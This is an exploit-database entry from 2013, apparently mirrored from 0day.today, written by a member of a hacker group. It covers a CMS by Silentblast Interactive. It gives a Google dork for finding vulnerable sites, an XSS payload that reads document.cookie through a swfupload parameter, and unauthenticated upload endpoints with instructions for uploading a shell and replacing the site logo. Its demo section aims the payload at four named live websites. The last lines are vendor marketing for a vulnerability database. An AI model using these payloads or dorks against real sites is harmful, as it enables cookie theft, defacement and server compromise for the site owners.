#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0 _ __ __ __ 1
#1 /' \ __ /'__`\ /\ \__ /'__`\ 0
#0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
#1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
#0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
#1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
#0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
#1 \ \____/ >> Exploit database separated by exploit 0
#0 \/___/ type (local, remote, DoS, etc.) 1
#1 1
#0 [+] Site : 1337day.com 0
#1 [+] Support e-mail : submit[at]1337day.com 1
#0 0
#1 ######################################### 1
#0 I'm The Black Devils member from Inj3ct0r Team 1
#1 ######################################### 0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Title : CMS Provided by Silentblast Interactive Multiple Vulnerabilities
# Date: 2013-03-15
# Software Link: http://www.silentblast.com/
# Credit: This Bug was founded by Asesino04 "The Black Devils"
# Tested on: Windows XP SP2
# Category: [webapps]
# Dork : inurl:/admin/includes/swfupload/
-----------
Xss
http://127.0.0.1/path/components/com_wordpress/path/wp-includes/js/swfupload/swfupload.swf?buttonText=[ XSS ]
doc_upload
you can upload files and remove others
http://127.0.0.1/admin/includes/doc_upload.php
image upload yu can bypass it and upload a shell
http://www.doncarmody.com/admin/includes/image_upload.php
then you'll find your file here
http://127.0.0.1/images/cms/
and from here you can easily change the logo picture
http://127.0.0.1/admin/includes/image_upload.php?moduleID=1&imageName=cmsLogo&module=cmsSettings&type=cmslogo&categoryID=0
https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-ash3/c0.0.380.380/p403x403/581866_256194131184828_1398221432_n.jpg
# Demo :
http://www.silentblast.com/admin/includes/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E
http://www.doncarmody.com/admin/includes/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E
http://ashtonrenovations.com/admin/includes/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E
http://www.stlukesmerced.org/admin/includes/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E
-----------
Thanks To : | r0073r | KedAns-Dz | D4RKCR1PT3R | Keystr0ke | x3o-1337 | Èlite TrØjan | sH3LL05Dz
| Ana Eve | DZ Combattant | Muhammad Talha Khan | r4dc0re | SeeMe CrosS | Zikou-16 | DaOne
| Angel Injection | NuxbieCyber | Tibit | Sammy FORGIT | D4NB4R beBoss | LORDOFDARKNES
| All Dz hackerz
-----------
Contact:
# Fane Page : www.facebook.com/Th3.Black.D3Vils
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : [email protected]
# 0day.today [2018-03-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation